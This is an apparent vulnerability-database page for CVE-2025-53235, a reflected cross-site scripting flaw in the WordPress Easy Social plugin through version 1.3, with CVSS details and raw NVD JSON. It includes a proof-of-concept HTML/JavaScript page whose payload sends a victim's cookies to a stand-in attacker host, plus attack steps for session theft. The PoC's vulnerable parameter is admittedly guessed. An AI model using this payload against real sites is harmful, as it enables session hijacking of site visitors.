Security Vulnerability Report
中文
CVE-2025-53235 CVSS 7.1 HIGH

CVE-2025-53235

Published: 2025-12-31 21:15:52
Last Modified: 2026-04-23 15:32:20

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in osuthorpe Easy Social easy-social-media allows Reflected XSS.This issue affects Easy Social: from n/a through <= 1.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Easy Social (easy-social-media) 任意版本 <= 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-53235 Reflected XSS PoC --> <!-- Target: WordPress Easy Social Plugin <= 1.3 --> <!-- Vulnerability: Improper Input Neutralization leading to Reflected XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-53235 PoC</title> </head> <body> <h2>CVE-2025-53235 - Easy Social Reflected XSS PoC</h2> <p>Malicious URL to trigger XSS:</p> <code id="xss-url"></code> <script> // Get the target URL from query parameter or use default const targetHost = window.location.search.split('target=')[1] || 'http://vulnerable-wordpress-site.com'; // XSS payload - extracts cookies and sends to attacker const xssPayload = '<script>fetch("https://attacker-server.com/steal?c="+encodeURIComponent(document.cookie))</script>'; // Construct the malicious URL // Note: The exact vulnerable parameter depends on plugin code analysis const maliciousURL = `${targetHost}/?s=${encodeURIComponent(xssPayload)}`; document.getElementById('xss-url').textContent = maliciousURL; // For demonstration, show alert if this is PoC page console.log('PoC URL generated:', maliciousURL); // Simulated attack execution (commented out for safety) // In real attack, victim visits this URL and XSS payload executes /* fetch(maliciousURL) .then(response => response.text()) .then(html => { // Check if XSS is reflected in response if (html.includes(xssPayload)) { console.log('[+] XSS vulnerability confirmed!'); } }); */ </script> <p><strong>Attack Steps:</strong></p> <ol> <li>Attacker crafts malicious URL with XSS payload</li> <li>Victim clicks the link or visits the crafted URL</li> <li>Server reflects unsanitized input in response</li> <li>Victim's browser executes malicious JavaScript</li> <li>Attacker steals session cookies or performs actions as victim</li> </ol> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53235", "sourceIdentifier": "[email protected]", "published": "2025-12-31T21:15:51.777", "lastModified": "2026-04-23T15:32:19.880", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in osuthorpe Easy Social easy-social-media allows Reflected XSS.This issue affects Easy Social: from n/a through <= 1.3."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en osuthorpe Easy Social permite XSS Reflejado. Este problema afecta a Easy Social: desde n/a hasta 1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-social-media/vulnerability/wordpress-easy-social-plugin-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}